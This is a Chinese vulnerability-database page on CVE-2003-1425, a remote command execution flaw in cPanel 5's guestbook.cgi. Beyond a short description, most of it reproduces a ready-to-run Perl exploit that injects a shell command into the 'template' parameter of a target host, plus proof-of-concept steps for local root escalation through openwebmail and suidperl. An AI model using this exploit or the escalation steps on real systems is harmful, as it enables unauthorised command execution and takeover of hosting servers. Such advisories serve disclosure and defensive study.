cPanel Guestbook.cgi远程命令执行漏洞

cPanel Guestbook.cgi远程命令执行漏洞

漏洞ID 1107208 漏洞类型 输入验证
发布时间 2003-02-19 更新时间 2003-12-31
图片[1]-cPanel Guestbook.cgi远程命令执行漏洞-安全小百科CVE编号 CVE-2003-1425
图片[2]-cPanel Guestbook.cgi远程命令执行漏洞-安全小百科CNNVD-ID CNNVD-200312-108
漏洞平台 CGI CVSS评分 10.0
|漏洞来源
https://www.exploit-db.com/exploits/22263
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200312-108
|漏洞详情
Cpanel是一款WEB主机控制程序,允许客户通过WEB接口管理WEB帐户。Cpanel包含的guestbook.cgi没有正确过滤用户提交的数据,远程攻击者可以利用这个漏洞以Cpanel进程权限在系统上执行任意命令。guestbook.cgi由于不正确过滤SHELL元字符,攻击者提交包含类似’|command’的数据给template变量,可导致命令直接传递个SHELL执行,可能以Cpanel进程权限在系统上执行任意命令或读取任意文件。
|漏洞EXP
source: http://www.securityfocus.com/bid/6882/info
   
A remote command execution vulnerability has been discovered in the cPanel CGI Application. This issue occurs due to insufficient sanitization of externally supplied data to the 'guestbook.cgi' script.
   
An attacker may exploit this vulnerability to execute commands in the security context of the web server hosting the affected script.
   
This vulnerability has been reported to affect cPanel version 5, previous versions may also be affected.

#!/usr/bin/perl
#
# ------- start here -------
#
# Bug Founded by: pokleyzz
#
# Cpanel is web hosting control panel which allow client manage their web account through
# web interface. Most of the application are written in perl and  compiled to binary.
#
# Details
# =======
# There is multiple vurnerabilities in this package as describe below.
#
# 1) Remote command Execution in guestbook.cgi (/usr/local/cpanel/cgi-sys/guestbook.cgi)
#
# There is classic perl open function vulnerability in template variable which allow any
# user to read any file or run command  as valid system user which assign to specific url
# in apache configuration.
#
# 2) Local privileges escalation (root)
#
# Cpanel come with openwebmail packages as one of web base email reader which suid root.
# In the system with suid perl install perfectly (with suid mode turn on) local user may
# include their own perl script when running openwebmail script (oom) through suidperl.
#
# Openwebmail will append perl include path (@INC) through SCRIPT_FILENAME environment variable,
# then include some file when execute.
#
# /usr/local/cpanel/base/openwebmail/oom line 14
#
# if ( $ENV{'SCRIPT_FILENAME'} =~ m!^(.*?)/[wd-]+.pl! || $0 =~ m!^(.*?)/[wd-]+.pl! ) { $SCRIPT_DIR=$1; }
# if (!$SCRIPT_DIR) { print "Content-type: text/htmlnn$SCRIPT_DIR not set in CGI script!n"; exit 0; }
# push (@INC, $SCRIPT_DIR, ".");
# .
# .
# .
# require "openwebmail-shared.pl";
#
# proof of concept:
# i) Create file openwebmail-shared.pl contain perl script you want to execute.
# ii) Set SCRIPT_FILENAME point to full path of openwebmail-shared.pl file you just create.
# iii) exec oom script (ex: suidperl -T /usr/local/cpanel/base/openwebmail/oom )
#
# -------- cut here --------
#
# coded by cyzek. cyzek@efnet
# thanks for p0ng [email protected]

$url = $ARGV[0];
$cmd = $ARGV[1];

if(@ARGV != 2){
        print " jozc.pl - Cpanel 5 and below Remote Exploit by cyzek.n";
        print " use %20 for spaces.n";
        print " usage: $0 <host> <cmd>n";
        exit;
}

use IO::Socket::INET;
$rem = IO::Socket::INET->new(
Proto       => "tcp",
PeerAddr    => $url,
PeerPort    => "80");

if ($rem) {
        print $rem "GET /cgi-sys/guestbook.cgi?user=cpanel&template=|$cmd| HTTP/1.0 nrnrnr";
        @resp = <$rem>;
}
print "@respnn";
|参考资料

来源:XF
名称:cpanel-guestbook-command-execution(11356)
链接:http://xforce.iss.net/xforce/xfdb/11356
来源:BID
名称:6882
链接:http://www.securityfocus.com/bid/6882
来源:VULNWATCH
名称:20030218Cpanel5andbelowremotecommandexecutionandlocalrootvulnerabilities
链接:http://archives.neohapsis.com/archives/vulnwatch/2003-q1/0087.html
来源:NSFOCUS
名称:4466
链接:http://www.nsfocus.net/vulndb/4466

相关推荐: Microsoft Windows NT/2000 cmd.exe CD本地缓冲区溢出漏洞

Microsoft Windows NT/2000 cmd.exe CD本地缓冲区溢出漏洞 漏洞ID 1107210 漏洞类型 缓冲区溢出 发布时间 2003-02-11 更新时间 2003-12-31 CVE编号 CVE-2003-1407 CNNVD-ID…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享